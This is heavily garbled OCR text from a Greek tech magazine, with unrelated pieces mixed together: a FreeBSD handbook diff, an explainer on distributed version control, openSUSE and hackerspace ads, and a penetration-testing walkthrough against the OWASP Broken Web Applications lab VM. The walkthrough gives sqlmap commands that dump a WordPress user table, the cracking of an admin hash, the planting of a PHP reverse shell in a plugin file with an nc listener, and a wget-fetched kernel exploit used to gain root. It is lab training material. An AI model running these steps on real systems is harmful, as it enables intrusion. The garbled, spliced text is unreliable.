--- a/en US.1808859-1/books/handbook/config/chapter.sgml Tue Nov 15 21:30:29 2011 +0200 


1.1 

1.2 +++ b/en US.1808859-1/books/handbook/config/chapter.sgml Wed Nov 16 08:46:03 2011 +0200 
1.3 @@ -2424,11 42424,15 ee 

1.4 

1.5 *orderedlist» 

1.6 «listitem» 

1.7 *para»Be certain that your kernel configuration includes 

1.8 the memory disk driver (&man.md.4;). It is default in 

1.9 *«filename»GENERIC«/filename» kernel.«/para» 

10 


*programlisting»device πᾶ # Memory "disks"«/programlisting» 

*para»The «filename»GENERIC«/filename» kernel already includes 
the memory disk driver (&man.md.4;) required for this operation. 
When building a custom kernel, make sure to include the 
following line in your custom configuration file:«/para» 


*programlisting»device ^ md«/programlisting» 
*para»For information on building your own kernel, please refer 


to «xref linkend-"kernelconfig"».«/para» 
21 «/listitem» 


Un 
+++++++ ++ каа 


Eh е ЛЛ 
У 


.23 «listitem» 
mercurial/reebsd-doc-el 


Па va δουλεύουμε 
паута тотка ка! 
µε ασφόλεια Πρέπει 
να χρησιμοποιούμε 
κάποιο distributed 
repository. Στην 
εικόνα βλέπετε 

TO repository στο 
οποίο καταχωρού- 
ντα! οι αλλαγές 
που κάνουμε στο 
"FreeBSD Greek 
Documentation 
Project" (http:// 
mercurial. 
freebsdgr.org). 
Апо εκεί οι aAAa- 
үёс που καταχω- 
ρούμε παίρνουν 

το δρόµο τους για 
το CVS (φαίνεται 
στην προηγούµενη 
εικόνα). Φυσικά - 
καθώς το mercurial 
εἶναι distributed 
repository- υπάρ- 
χουν пара πολλοί 
κλώνοι TOU! 
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Σε ἑνα κατανεμημένο VCS (ἡ Distributed VCS) δεν υπάρχει ἡ ἐννοια 
του κεντρικού repository. Κάθε χρήστης ἐχει στο μηχάνημα του ἑνα πλἠ- 
ρες αντίγραφο του repository και µπορεί να κάνει ката βούληση checkout 
και commit. Ὅμως, για να καταλάβετε καλύτερα пос λειτουργούν τα KA- 
τανεμημένα VCS, ας δούµε την топік рой εργασίας. 


e О vog χρήστης παίρνει ἑνα αντίγραφο (clone) rou repository апо 
κάποιον ἆλλο χρήστη. 


ο To δίκτυο πλέον δεν εἶναι απαραίτητο: ο χρήστης κάνει checkout 
апо το τοπικὀ του αντίγραφο και τα επεξεργάζεται στην περιοχἠ 
εργασίας του. Ἔτσι, το checkout και το commit γίνονται топіка. 


Тора βἐβαια θα µου πείτε -Kai θα ἐχετε Oikio- бт! εφόσον δεν υπάρχει 
κεντρικὀ repository anó пой θα πάρω εγὠ ro αρχικὀ αντίγραφο; Μα, апо 
κάποιον ἄλλον που δουλεύει ἠδη στο project! Τις περισσότερες φορὲς, n 
ομάδα που εργάζεται στο project ορίζει το αντίγραφο ενός συγκεκριμέ- 
vou developer ως “κεντρικό”. Αυτό βέβαια αποτελεἰ µια σύμβαση για να 
για διευκολυνθεί η εργασία. Συμφωνούν δηλαδἠ oi developer ότι όλες οι 
αλλαγές θα καταλήγουν τελικἀ στο repository του τάδε χρήστη. Επομέ- 
νως, ὀποιος ξεκινάει тора πρέπει να πάρει αντίγραφο апо τον συγκεκρι- 
рёуо χρήστη. Н δημιουργία ενὸς αντιγράφου ονομάζεται cloning. Κάπου 
εδὠ όμως προκύπτει ἑνα ακόµα ερώτημα. Пос Ва στείλει κανεἰς τις αλλα- 
γὲς του στους ἄλλους ἡ στο ката σύμβαση "κεντρικό” repository, εφόσον 
το commit καταλήγει στο τοπικὀ αντίγραφο; Ta distributed repositories 
ορίζουν δύο ακόµα βασικὲς διαδικασίες: 


Push: Με αυτή τη διαδικασία μπορούμε να στείλουμε τις αλλαγές µας σε 
ἑνα ἄλλο repository, στο onoio βέβαια θα πρέπει να έχουμε τα κατάλληλα 
δικαιώματα πρὀσβασης! 


Pull: Με αυτή τη διαδικασία µπορεί κάποιος ἆλλος να “τραβήξει” τις aà- 
λαγὲς που έχουμε κάνει στο бїк© µας αντίγραφο και να τις ενσωματώσει 
στο ӧіко του. Τυπικά, δεν χρειάζονται ειδικἁ δικαιώματα για να διαβάσει 
κάποιος то repository κάποιου ἄλλου (ώστε να κάνει pull). Αρκεἰ βέβαια 
να έχουμε ρυθµμἰσει κατάλληλα το μηχάνημα και το repository για δικτυ- 
ακἠ πρὀσβαση. 


Δύο πολύ γνωστὰ distributed repositories εἶναι ro Git (δημιούργημα rou 
Linus και χρησιμοποιείται στην ανάπτυξη του πυρήνα rou Linux) και το 
Mercurial (γραμμένο σε Python, ταχέως αναπτυσσόμενο και µεγάλη µας 
συμπάθεια, που σημαίνει ὁτι θα σας το μάθουμε αναγκαστικἀ) Ξέρουμε 
βέβαια бт! тора σας έχουμε ανοίξει την ὀρεξη, αλλά θα πρέπει να κάνετε 
υπομονή. Θα πρέπει να περιμένετε μέχρι το επόμενο τεύχος, οπὀτε και 
θα γνωρίσουμε апо κοντὰ ra CVS kai Mercurial, ενώ θα μάθουμε να στἠ- 
νουµε просопка αλλά και διαδικτυακὰἁ repositories. Πα την opa όμως 
πρέπει να κάνω commit την τελικἠ εκδοχή του άρθρου ;) 


JOIN THE GREEK GEEKO FORCE !!! 
openSUSE 12.1 15 here! 
Time to Party !!! 


Join a G(r)eek 
Release Party !!! 


Have a lot of fun ! 


Website: http:/ /www.opensuse.gr / 
Blog: http: / /amb.opensuse.g / 
Mailinglist: opensuse-elGopensuse.org 
ІКС channel: #opensuse-el 
Twitter: http: / /twitter.com /openSUSE Cr 
identi.ca: http:/ /identica/opensuseg 
Facebook: http: / / onfb.me /eWFFe5 
Release parties: http:/ /bitly /release parties 
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To OWASP Broken Web Applications Project εἶναι ша εικονικἠ μηχανή 
δημιουργημένη µε ro VMware, η οποία παρέχεται δωρεὰν και εἶναι Ka- 
τἀλληλη για ὁποιον θέλει να τεστάρει τις ικανὀτητὲς του στο penetration 
testing. Н διανομὴ βασίζεται στο Ubuntu Linux και τρέχει πλήθος παλιών, 
μη ενημερωμένων εφαρμογών, κάτι που την καθιστἀ va άκρως ευπαθὲς 
σύστημα ως προς µια μεγάλη ποικιλία επιθέσων, ὁπως, n.x., XSS, SQL 
injection, command injection к.а. Μπορούμε va κατεβάσουµε την εικονι- 
кй μηχανή апо εδώ: 


http://sourceforge.net/projects/owaspbwa/files 


Σημειώστε бт! пара το γεγονὸς πως то OWASP BWA προορίζεται για το 
VMware, κάλλιστα μπορεὶ va λειτουργήσει και като апо τις νεώτερες 
εκδόσεις του VirtualBox. (Αρκεἰ να φτιάξετε ἑνα уёо Ubuntu-based VM, 
о δίσκος του οποίου δεν θα εἶναι καινούριος αλλά θα ορίζεται апо ro ap- 
χείο “OWASP Broken Web Apps.vmdk^". Πριν ενεργοποιήσετε για πρώτη 
фора το νέο VM µε το OWASP, φροντίστε ὡστε να εἶναι τσεκαρισμένο 
το Enable PAE/NX, στο tab µε ὀνομα Processor της κατηγορἰας System 
των ιδιοτήτων του ΝΜ.) Για τη συνέχεια πρέπει να πούμε бт! υπάρχουν 
πολλοί τρόποι προκειµένου να πάρουμε root access στο OWASP ВМА. 
Σας παρουσιάζουμε ἑναν апо αυτούς, ο οποίος μάλιστα δεν εἶναι καν ο 
βέλτιστος. Εἶναι όμως αυτὸς που ακολουθήσαμε, παἰζοντας κι εξερευνώ- 


Εἰκόνα:1. vrac то OWASP BWA. Εἰμαστε σίγουροι бт! πολλοὶ апо εσὰς θα βρεῖτε κι 
Καλωσορίσατε άλλους, οικονοµικότερους KI εξυπνότερους τρόπους για να φτάσετε στο 
στον κόσμο pwning του συγκεκριμένου Linux box. Σας προκαλούμε να τους υλοποιή- 
ο... σετε κι αφού πετύχετε να µας πεῖτε κι εμάς пос το καταφέρατε, περνώ- 
roken We : : : ^ 

Applications; vrac µια βόλτα απὀ τη fan page µας ἢ апо ro deltahacker.gr. 

SUR. ενα σωρό To прото πράγμα nou οφείλουμε να κάνουμε αφού ενεργοποιήσουµε το 
ое ойс VM, εἶναι να βρούμε την IP nou ἐχει. Av και αυτὀ παρουσιάζεται στην 
προκαλούν να τις οθόνη µετά Το boot, το να ro δούμε εκεὶ δεν ἐχει και πολὺ νόημα. Εκεί ἀλ- 
εκμεταλλευτεί- λωστε εμφανίζεται και το password του χρήστη root. To να αποκτήσουμε 
τε. ΤΙ λέτε; Θα όμως TOI root access επίσης δεν ἐχει νόημα. Αντιθέτως, auTO που έχει 
HIODEGETE VG, . νόημα εἶναι να υποθέσουµε πως δεν ξέρουμε ro root password, καθὼς 
ο... κι ότι εξαπολύουµε µια αληθινἠ επίθεση μέσα σε ἑνα αληθινό ГАМ, ónou 
... 000 δεν γνωρίζουμε ro IP rou στὀχου. Πα τους Aóyouc αυτούς ξεκινάμε HE TO 
νομίζετε... εργαλείο птар, προκειµένου να σκανάρουµε ὁλο το δίκτυο και να βρούμε 


Ple Ek Уен Hgtoy Bookmarks Pos Help 
|&yovese Broken web Applications [E31 * 


Ф 9 [@ voe: EXJIE EE *4 


OWASP Broken Web 
Applications 


This is the VM for the Open Web Application Security Project (OWASP) Broken Web Applications project. It contains many, very vulnerable web applications. More information about this project can Бе 
found at http://www.owaspbwa.org/. 


The following vulnerable web applications are running on the VM (listed in no particular order). 


FAINIKG APPLICATIONS 


NEALISTIC, INTENTIONALLY VULNERABLE APPLICATIONS: 


Ü OWASP Vicnum 
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Puning a Linux server xuyithoutx the framework! 
ri 


Source οἵ; http://192:168:10:132/wordpress/ - Mozilla Firefox 
fle Ейс View Help 


«link rel="stylesheet" hrefz"http://192.168.10. rápress, [thenes/default/style.css" type="text/css" media="screen" /» 
«link rele"alternate" types"application/rss«xml" title="Broken WordPress RSS Feed" hrefe"http://192.168.10.132/wordpress/?feederss2" /» 


<link rele"pingback" hrefe"http://192.168.10.132/wordpress/xalrpc.php" /» 


se type="text/css" media-"screen"» 
To accomodate differing install paths of WordPress, images are referred only here, 
and not in the wp-layout.css file. If you prefer to use only CSS for colors and what 
not, then go right ahead and delete the following lines, and the image files. */ 


body ( background: url("*http://192.168.10.132/wordpress. henes/default/images/kubrickbgcolor.jpg"); ) 

*page ( background: url("http://192.168.10.132/wordpress, hemes/default/images/kubrickbg.jpg") repeat-y top; border: none; ) 

header ( background: url("http://192.168.10.132/wordpress, hemes/default/images/kubrickheader.jpg") no-repeat bottom center; ) 
$footer ( background: url("http://192.168.10.132/wordpress, henes/default/images/kubrickfooter.]pg") no-repeat bottom; border: none;) 


^^ Because the template is slightly different, size-wise, with images, this needs to be set here 
If you don't want to use the template's images, you can also delete the following two lines. */ 


#һеайег { margin: 0 !important; margin: 0 0 0 lpx; padding: 1рх; height: 198px; width: 758px; ) 
#headerimg { margin: 7px 9px O; height: 192px; width: 740px; } 


^^ To ease the insertion of a personal header image, I have done it in such a way, 
that you simply drop in an image called 'personalheader.jpg' into [ш /images/ 
directory. Dimensions should be at least 760px x 200px. Anything above that will 
get cropped off of the image. */ 
n 


sheaderimg ( background: url('http://192.168.10.132/wordpress /TTREEIEGIIMthenes /default/images/personalheader.jpg') no-repeat top;) 
А 
«/style» 


<link rele"EditURI* types"application/rsdexml" titles"RsD" hrefe"http://192.168.10.132/wordpress/xalrpc.php?rsd* /» 
«script types"text/javascript"» 
function changePicture(img, galid,myalt,myvidth,myheight.myftid) { 
document. getElenentById(galid).setAttribute('src', ing): 
document. getElenentById(galid).setAttribute('alt'.myalt):; 
document. getElementById(galid).setAttribute('title',myalt);bigide'b'4galid; 
document. getElenentById (bigid).setAttribute ('href', img); 
var footerid-galide'ft'; 
document. getElementById(footerid).firstChild.nodeValuesdocument.getElementById (myftid).firstChild.nodeValue; 


«/script» 
«style type="text/css" media-"screen"» 
import url(http://192.168.10.132/wordpress / ЩШИЛИЙР Lugins /nygallery /css/mygallery default.css); 
«/style»«/head» 


<body> 
<div id="page">| 


<div id="header"> 
<div id="headerimg"> 
<һ1><а href="http://192.168.10.132/wordpress/">Broken WordPress</a></hl> 
«div class-"description"»Just another WordPress 2.0.0 weblog</div> 
</div> 
</div> 
<hr /> 


«div ide"content* class="narrowcolumn“> 


«div classe"post" ide"post-4"» 
«h2»«a hrefe"http://192.168.10.132/wordpress/?p»4" rele"bookmark" title="Permanent Link to New Plug-ins"»New Plug-ins«/a»«/h2» 
«small»April l8th, 2011 </-- by admin --»«/small» 


ποπ παν > on [ ТЕТ 


Line 55, Col 16 
τα ενεργά hosts. Anó ro Linux box µας, λοιπὀν, ανοἰγουµε ¿va repparikó Εικόνα 2. 
και πληκτρολογούμε: Εξετάζοντας το 
Source Της πρώτης 
rootQgiannis-desktop:-it птар 192.168.10.* σελίδας rou ano- 
; : . μακρυσμένου site 
Starting Nmap 5.00 ( http://nmap.org ) at 2011-10-30 15:19 EET Είναι πάντα καλή 
Interesting ports on 192.168.10.132: ιδέα va το Κάνουμε 
GUTÓ, μάλιστα πριν 
Not shown: 993 closed ports βάλουμε κάποιο 
PORT STATE SERVICE αυτοματοποιημένο 
εργαλείο να πιάσει 
22/tcp open ssh δουλειά... 


80/tcp open http 

139/tcp open netbios-ssn 

143/tcp open imap 

445/tcp open microsoft-ds 

5001/tcp open commplex-link 

8080/tcp open http-proxy 

MAC Address: 00:0C:29:09:39:67 (Vmware) 
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WordPress Spreadsheet 0.6 - Mozilla Firefox eJ [181] [23 


File Edit View History Bookmarks Tools Help 


©) Broken WordPress. х] Ө WordPress M os x| T І v 


q: > [© 192.168.10.132/wordpress/wp 


WordPress database error: [Duplicate entry '0' for key 'id'] 
INSERT INTO wp spreadsheet (ss tablehtml, ss name, ss description) VALUES (* 


', "Мем", 'Blank spreadsheet'); 


Spreadsheet name: S description: 


| Save Spreadsheet || Reload Spreadsheet | 


Εικόνα 3. 

Κάτι συμβα!- 

νει εδώ καὶ 
σίγουρα αξίζει 
µιας κάποιας 
προσεκτικότερης 
διερεύνησης.. 
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Μαθαΐνουμε ¿TOI ὁτι ο στόχος βρίσκεται στη διεύθυνση 192.168.10.132. 
Ανοίγουμε τον web browser kai στην address bar πληκτρολογούμε τη 
διεύθυνση IP του στὀχου, ώστε να δούμε τι βρἰσκεται -av βρίσκεται каті- 
εκεἰ. Апо τη στιγµἠ βέβαια nou ro port 80 εἰναι ανοικτὀ, εἶναι πολὺ ni- 
θανὸ va τρέχει κάποιος web server. Πράγματι, ἐτσι εἶναι. Στον browser 
παρουσιάζεται το web interface του OWASP BWA, προκαλώντας µας να 
διαλέξουμε κάποια апо τις διαθέσιμες εφαρμογἑὲς yia να τεστάρουμµε τις 
ικανότητες µας. Δεκτή η πρὀκληση! 


Хр, τι θα λέγατε να δούμετι βρίσκεται πίσω апо το Wordpress; Κάνοντας 
κλικ πάνω του µεταφερόμαστε στην αρχικἠ σελἰδα του site. Εξερευνούμε 
τα διάφορα links nou εἶναι μέσα στην πρώτη σελίδα, αλλά δεν βλέπουμε 
κάτι ιδιαίτερα ενδιαφἐρον. Πριν βάλουμε ¿va εργαλεἰὶο να ψάξει yia aðu- 
ναμίες κι ενεργά directories, ας δούµε ro source code της σελίδας μήπως 
κι ανακαλύψουμε κἀποιο ενδιαφἑρον στοιχείο... 


Βλέπουμε αρκετά directories τα οποία δεν εἶναι εμφανή “εξωτερικά”. Ας 
δούμε τι κρύβουν. Στη διαδρομή 


http://192.168.10.132/wordpress/wp-content/plugins/wpSS/ 


την προσοχὴ μάς τραβάει το αρχείο 55 handler.php. Πράγματι, καλώντας 
TO anó τον browser αυτό αποκρἰνεται ως εξής: 


Wordpress Spreadsheet: No ss id in URL 


Puning a Linux server xuyithoutx the framework! 
ML 


Αρχείο Επεξεργασία Προβολή Τερματικό Καρτέλες Βοήθεια 


E gag 


| root@giannis-desktop: -/sqlmap Ж. |rootGgiannis-desktop: -/sqlmap/output. 
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) 
web application technology: PHP 5.3.2, Apache 2.2.14 
back-end DBMS: MySQL 5.0 
[17:10:06] [INFO] fetching database names 
[17:10:06] [INFO] the SQL query used returns 29 entries 
available databases [29]: 
κ] #mysql50#.svn 


ens 
d 

gallery2 
getboo 

ghost 
gtd-php 

HEX 
information schema 
ISP 

joomla 
mutillidae 
mysql 
orangehrm 
personalblog 
peruggia 
phpbb 
phpmyadmin 
PROXY 
rentnet 
tikiwiki 
vicnum 
wackopicko 
webcal 
wordpress 
wraithlogin 
yazd 

yazd10 


:10:09] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/192.168.10.132' 


[*] shutting down at: 17:10:09 


rootügiannis-desktop:-/sqlmap£ β 


Ας δοκιµάσουμε va του nepácoupe auro το 55 id nou δεν βρίσκει στο Εικόνα 4. 
URL, δινοντὰς του κάποιον αριθμό (π.χ. 2 ἡ 3). Αλλάζουμε λοιπὀν το URL To ѕдітар μόλις 
ολοκλήρωσε τους 

σε ελέγχους του και 
παρουσιάζει όλες 
τις βάσεις πίσω 
апд ro αποµακρυ- 
σμένο WordPress 
site. 


http://192.168.10.132/wordpress/wp-content/plugins/wpSS/ss . 
handler.php?ss id-3 


Εἶναι Φανερὸ бт! υπάρχει károio πρόβλημα εδώ, ἐτσι δεν εἶναι; Αντί να 
δοκιµάσουμµε χειροκίνητα να αποκτήσουμε ra credentials των χρηστών, 
ας καταφύγουμµε στο πολὺ кало εργαλείο sqlmap, ὥστε να πάρουμε ὀλες 
τις βάσεις δεδομένων. Σε va τερµατικὀ πηγαίνουμε στον φάκελο του 
sglmap (αναλόγως της διανομὴς ενδέχεται να διαφέρει ο τρόπος nou KA- 
λούμε το sqlmap) και του ζητάμε va µας επιστρέψει ὁλες τις βάσεις δε- 
δομένων: 


root@giannis-desktop:~/sqlmap# python sqlmap.py -o -u 
http://192.168.10.132/wordpress/wp-content/plugins/wpSS/ss_ 
handler.php?ss_id=3 --dbs 

sqlmap/0.9 - automatic SQL injection and database takeover tool 
http://sqlmap.sourceforge.net 

[*] starting at: 17:04:40 


[17:04:41] [INFO] using /home/user/sqlmap/output/192.168.10.132/ 
Session' as session file 


Εικόνα 5. 

To sqlmap napou- 
σιάζει ra tables 
που υπάρχουν στη 
βάση µε óvoua 
wordpress. 
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[17:04:41] 
[17:04:41] 


[17:04:41] 
seconds 


[17:04:42] 
[17:04:42] 
[17:04:42] 
[17:04:42] 


[INFO] testing connection to the target url 
[INFO] testing NULL connection to the target url 
[INFO] testing if the url is stable, wait a few 


[INFO] url is stable 

[INFO] testing if GET parameter 'ss_id' is dynamic 
[WARNING] GET parameter 'ss_id' is not dynamic 

[INFO] heuristic test shows that GET parameter 'ss_id 


might be injectable (possible DBMS: MySQL) 


[17:04:42] 
[17:04:42] 


HAVING clause 


[17:04:43] 
or HAVING 


[17:04:43] 


[INFO] testing sql injection on GET parameter 'ss_id 
[INFO] testing 'AND boolean-based blind - WHERE or 


[INFO] testing MySQL >= 5.0 AND error-based - WHERE 


clause 


[INFO] GET parameter 'ss id' is MySQL >= 5.0 AND 


error-based - WHERE or HAVING clause' injectable 


[17:04:43] 
[17:04:43] 
[17:04:43] 
columns 
[17:04:44] 
4 columns 


[17:04:44] 


[INFO] testing MySQL » 5.0.11 stacked queries 
[INFO] testing MySQL » 5.0.11 AND time-based blind 
[INFO] testing MySQL UNION query (NULL) - 1 to 10 


[INFO] target url appears to be UNION injectable with 


[INFO] GET parameter 'ss id' is MySQL UNION query 


(NULL) - 1 to 10 columns' injectable 


GET parameter 'ss id' is vulnerable. Do you want to keep testing 
the others? [y/N] 


Μετά апо λίγα δευτερόλεπτα το sglmap κάνει µια παύση και µας ενηµε- 
ρώνει ὁτι, πράγματι, ο στὀχος εἶναι ευάλωτος! Ρωτά αν θἐλουµε να συνε- 


µία Debo Ἱερμαικὸ Κορείλες бой 


top: -/sqimtp 
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root Gyannt-desktop: -/sqimap/output 


Puning a Linux server xuyithoutx the framework! 
MVP 


χίσουμε τον ἐλεγχο και φυσικά απαντάμε καταφατικἀ. 


Ας επιµείνουμε, ζητώντας апо ro ѕдітар να µας δώσει ra tables που 
υπάρχουν µέσα στη βάση µε ὀνομα wordpress. 


root@giannis-desktop:~/sqlmap# python sqlmap.py -o -u 
http://192.168.10.132/wordpress/wp-content/plugins/wpSS/ss_ 
handler.php?ss_id=3 -D wordpress --tables 


Πολύ ωραία. Μεταξύ των αποτελεσμάτων nou επέστρεψε ro sqlmap βλὲ- 
πουμε бт! υπάρχει ο πίνακας χρηστών (wp. users). Ας κοιτάξουμε та περι- 
εχὀμενάἁ του, να δούμε τι κρύβει (υποψιαζόμαστε βέβαια τι κρύβει, αλλά 
ac προσποιηθούµε ὁτι δεν έχουμε ιδέα). 


root(giannis-desktop:-/sqlmapt python sqlmap.py -o -u 
http://192.168.10.132/wordpress/wp-content/plugins/wpSS/ss_ 
handler.php?ss_id=3 -D wordpress -T wp_users --dump 


Το sqlmap πρόθυμα επιστρέφει τα περιεχόμενα rou nivaka wp users та 
οποία, περιττὸ να σημειώσουμε, αποτελούν ἀκρως ευαἰσθητα στοιχεία. 
Ανάμεσα с’ αυτά εἶναι και το md5 hash rou admin password: 


21232f297a57a5a3743894a0e4a801fc3 


Κοιτάζοντας σε κάποιες online βάσεις δεδομένων yia το σπάσιμο -ακρι- 
βἐστερα για την αντιστροφἠ- του md5, γρήγορα ανακαλύπτουμε Ori η 
αντιστροφή του προηγουμένου hash δίνει το 


admin 


Έχουμε λοιπὀν τα στοιχεία rou διαχειριστἠ του WordPress. Έτσι, ὀμορφα 
κι ωραία κάνουμε login µε username ro admin και password επίσης то 
admin. Ψάχνοντας λἰγο ως διαχειριστὲς το site, παρατηρούμε кайт! ap- 
κετὰ ενδιαφέρον. Με κλικ στο Manage κι апо κάτω στο Files, βλέπουμε 
κάποια .php files στα δεξιά, τα οποία μάλιστα ως διαχειριστὲς που gipa- 


d : : h Я Εικόνα 6. 
στε μπορούμε va τροποποιἠσουµε. Υποψιαζόσαστε μήπως τι θα γίνει αν Ιδού rd περιεχό- 
σβήσουμε rov κὠδικα κάποιου αρχείου και βάλουμε στη θέση του τον μενα του πίνακα 
κὠδικα evóc PHP reverse shell; Και yia να σας βοηθήσουμε λίγο, θα σας wp. users! 
[:] TENES ШОЛ 


Horto Επεξεργασία ПрооМ Ἱερμαικό Κορτέλις Βοήθεια 


roocegrennis-desktop: -/sqlmap. © гохёаппв-деўор: =/sqlmap/output 


y (NULL) - 1 to s 
LECT NULL, ,121,58) , IFNULL (CAST (CHAI 99,121,73,106,101) AS CHAR) ,CHAR(32) ) ‚СНА 


| ID | user activation us a ser login | user nicename | user pass 
url | 


| NULL 


| NULL 


5д\тар, 
ар/оиїриї/1< 


Ggiannis 
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Ple Edt Vew Нишу Bokmaris Pus Help 


|@ Broken wordpress - Template & Pe E- | 45 | 


PÜTTICNXTUYT UE ET 


БОЕ 9) ἃ 


р 


Other Files 


т edit a file, type its name here. You 


| | edt fie » 


Editing wp-content/plugins/akismet/akismet.php 


© Recent 
мап Index Template 
| Соттоп 
мып Index Template. 


d а са hrefe"http://wor. 
и 15 days. Mat ti 


my-hacks.php (legacy 
hacks support) 


Update File » 


сап edit any file writable by the server, e.g. CHMOD 666. 


Note: of course, you can also edit the files/templates in your text editor of choice end upload them. This online editor 15 only meant to be used when you don't have access to a text editor or FTP client. 


Εικόνα 7. 

Μιας κι έχουµε 
μπει µε δικαιώμα- 
ra administrator 
ото WordPress, 
μπορούμε va 
επεξεργαστούµε 
οποιοδήποτε апо 
τα εγκατεστημένα 
plugins. Пат! биос 
θα θέλαμε va то 
κάνουμε αυτό; (E, 
γιατί;) 
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наа 8 


πούμε От! το πλήρες URL του τροποποιημένου αρχείου θα το δώσουμε 
στον Web browser, ἔχοντας то пеїсаї να περιμένει ;) 


Κατεβάζουμε ro PHP reverse shell апо το URL 


http://pentestmonkey.net/tools/php-reverse-shell/php-reverse- 
shell-1.0.tar.gz 


Αφού ro anocuuni£couus ανοίγουμε µε ¿vav text editor το αρχείο php- 

reverse-shell.php ki αντιγράφουµε ào το περιεχὀμενὸ του. Ἐπειτα nn- 

γαίνουμε στο αρχεἰο akismet.php του ομώνυμου plugin του WordPress, 

σβήνουμε το περιεχὀμενὸ του και στη θέση του βάζουμε το περιεχόμενο 

TOU php-reverse-shell.php που μόλις αντιγράψαμε. Προσοχή: Μέσα στον 

κὠδικα του php-reverse-shell.php βρἰσκουµετις ακόλουθες δύο γραμμές: 
фір = '127.0.0.1'; // CHANGE THIS 


$port - 1234; // CHANGE THIS 


Προφανώς, οφείλουμε να αλλάξουμε τις τιμὲς των μεταβλητών $ip και 
$port нє TIG κατάλληλες τιμὲς που αφορούν στο μηχάνημα опоо θα трё- 
χει το netcat. (Πα την $ip βάλτε ro IP του μηχανήματος апо το οποίο 
κάνετε την επίθεση, evo για την $port βάλτε την τιµή 4444.) 


Αποθηκεύουμετις αλλαγές που κάναμε στο akismet.php (κλικ oro Update 
File, като δεξιὰ). Σε ἑνα τερματικὀ ξεκινάμε vav listener, ορίζοντας ως 
port αυτό που μόλις βάλαμε στη μεταβλητή $port. 


rootQgiannis-desktop:-4t nc -vl 4444 


Προσοχή: Αναλόγως τη διανομή υπάρχουν διαφοροποιήσεις στον τρόπο 
με τον οποίο τρέχουμε το netcat. Στο BackTrack, π.χ., θα δίναμε 


πς -1νρ 4444 


Αμέσως μετὰ επιστρέφουµε στον web browser και καλούμε ro shell, ώστε 
να δοκιμάσει να κάνει σύνδεση nioo στο рпҳаупра µας. Н κλήση του 
shell επιτυγχάνεται πληκτρολογώντας στην address bar rou browser то 
ακόλουθο URL: 


Puning a Linux server xuyithoutx the framework! 
VL 
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Αρχείο Επεξεργασία Προβολή Τερματικό Καρτέλες Βοήθεια 


rootGglannis-desktop: -/sqlmap. X | roxtGglannis-desktop: ~ 


http://192.168.10.132/wordpress/wp-content/plugins/akismet/ 
akismet.php 


Διαπιστώνουμε ὁτι αποκτάµε local πρόσβαση στον στὀχο -- και συγκεκρι- 
μένα μέσα στον λογαριασμὀ του χρήστη www-data: 
root(giannis-desktop:-4 nc -vl 4444 
Connection from 192.168.10.132 port 4444 [tcp/*] accepted 


Linux owaspbwa 2.6.32-25-generic-pae s44-Ubuntu SMP Fri Sep 17 
21:57:48 UTC 2010 i686 GNU/Linux 


13:08:26 up 4:02, 0 users, load average: 0.00, 0.00, 0.00 
USER TTY FROM LOGINQ IDLE JCPU PCPU WHAT 

uid-33(www-data) gid-33(www-data) groups-33(www-data) 
/bin/sh: can't access tty; job control turned off 

$ whoami 


www-data 


$ 


Εδὠ που φτάσαμε εἰναι σίγουρο бт! δεν θα τα παρατήσουμε αν δεν 
πάρουμε root access στον στὀχο! Επειδή λοιπὀν δεν έχουμε δικαιώματα 
εγγραφἠς στους περισσότερους φακέλους, πηγαΐνουµε στον φάκελο / 
var/www και εκτελώντας την εντολἠ Is -la επαληθεύουµε бт! έχουμε õi- 
καιώματα εγγραφἠς στο συγκεκριµένο directory. Τώρα πρέπει να βρούμε 
το κατάλληλο exploit για να προβιβαστούμε σε root (να κάνουμε, δηλα- 
бї, το λεγόμενο privilege escalation). Κοιτάμε την ἐκδοση rou kernel 
που τρέχει στο μηχάνημα-στὀχο, ὥστε να ψάξουμε για κἀποιο διαθέσιμο 
exploit που θα µας δώσει πλήρη δικαιώματα. Μετά апо λιγη αναζήτηση 
στο Διαδίκτυο βρίσκουμε ro exploit µας στη διεύθυνση 


http://www.vsecurity.com/download/tools/linux-rds-exploit.c 


Επιστρέφουµε στο τερματικὀ που µας παρέχει πρὀσβαση στον отоҳо κι 
αφού σιγουρευτούμε ὁτι εἱμαστε στο directory var/www κατεβάζουμε то 
exploit εκεί: 


wget http://www.vsecurity.com/download /tools/linux-nrds- 
exploit.c 


--2011-10-30 13:54:17-- http://www.vsecurity.com/download/tools/ 
linux-rds- exploit.c 


Resolving www.vsecurity.com... 209.67.252.12 


Connecting to www.vsecurity.com|209.67.252.12|:80... connected. 


HTTP request sent, awaiting response... 200 OK 


Eikóva 8. 

Εχουμε shell access 
ото target box 
σλλά иёса στον 
www-data, που 
εἶναι ο Aoyapia- 
σμός απὀ τον οποίο 
τρέχει о Арасһе 
web server. Εἶναι 
άραγε δυνατὀν va 
μεταβούμε στο 
λογαριασμὀ του 
υπερχρήστη root; 
Αν ναι, πὀσο εὐκο- 
λο εἶναι; 
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Εικόνα 9. 
Εἶναι va µην πάρει 
o attacker shell 
access с’ éva 
απομακρυσμένο 
box. Апо εκεί και 
πέρα, то πότε θα 
πάρει *ка!* root 
access εἶναι θέμα 
χρόνου ;) 
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Length: 6435 (6.3K) [text/x-c] 
Saving to: `linux-rds-exploit.c' 


OK saes 100% 40.2K=0.2s 


2011-10-30 13:54:18 (40.2 KB/s) - `linux-rds-exploit.c' saved 
[6435/6435] 


Μεταγλωττίζουμε ro exploit 


και TO εκτελούμε 


Και vai, апоктане αμέσως πρὀσβαση στο Лоүартасро rou root. Πλέον, το 
απομακρυσμένο σύστημα μάς ανἠκει 10796! 


Αρχείο Επεξεργασία Προβολή Τερματικό Καρτέλες Βοήθεια 


| rootGgiannis-desktop: ~ 


Όπως ακριβώς 
μοιραζόμαστε 
TOV κὠδικά µας, 


> έτσι θέλουμε νο 
μοιραστούμε και 

— τις ιδέες мос! 
Γιατί λοιπόν να 


ΠαςκθΓθραςθ.ΟΓ μην τοκάνουµε 


Αμπατιέλου 11, Αθήνα : b 
πλησίον ΗΣΑΠ Ay. Ελευθέριος απο κοντα; 


Ebooks Python UnitedTransnation 


Unauthorized Hackathons 
Awmn  SoftwareFreedomDoy 


OpenLibrary MozillaGreece 
Melissi Fedora Hackfests 
Arduino BookCrossing 


Hellug SysAdmin OpenGarden 
OpenData Aeroponics руф 


CreativeCommons 


Μάθε περισσότερα για To hsgr, το Πρόγραμμα Εκδηλώσεων 
και πως μπορείς και εσύ να συμμετέχεις: http://hockerspace.gr 


Fa «у, " 


hI ---- - ши шш 


TUESDAYS 10PM 


